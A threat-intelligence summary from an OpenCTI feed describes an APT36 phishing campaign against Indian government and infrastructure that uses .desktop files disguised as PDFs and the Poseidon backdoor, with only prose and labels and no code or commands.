Indian Infrastructure Targeted with Desktop Lures and Poseidon Backdoor
NetmanageIT OpenCTI - opencti.netmanageit.com
SUMMARY :
APT36, a Pakistan-linked threat group, has expanded its operations to target Indian government and civilian infrastructure, including railways, oil & gas, and the Ministry of External Affairs. The group employs sophisticated phishing techniques and novel payload strategies, using .desktop files disguised as PDF documents to execute malicious scripts. Two attack variants were identified, utilizing single and redundant command and control server setups. The Poseidon backdoor, built on the Mythic framework, is deployed for persistent access and lateral movement. Over 100 phishing domains impersonating Indian government organizations were discovered, primarily hosted by AlexHost. The campaign, active since early July 2025, poses a significant threat to Indian public sector and critical infrastructure.
OPENCTI LABELS :
phishing,india,infrastructure,poseidon,government impersonation,poseidon backdoor,mythic framework,desktop lures
Open in NetmanageIT OpenCTI Public Instance with below link!
Use public read only username and password on login page.
NOTE : Use Public READ only user credentials on login page banner.
Indian Infrastructure Targeted with Desktop Lures and Poseidon Backdoor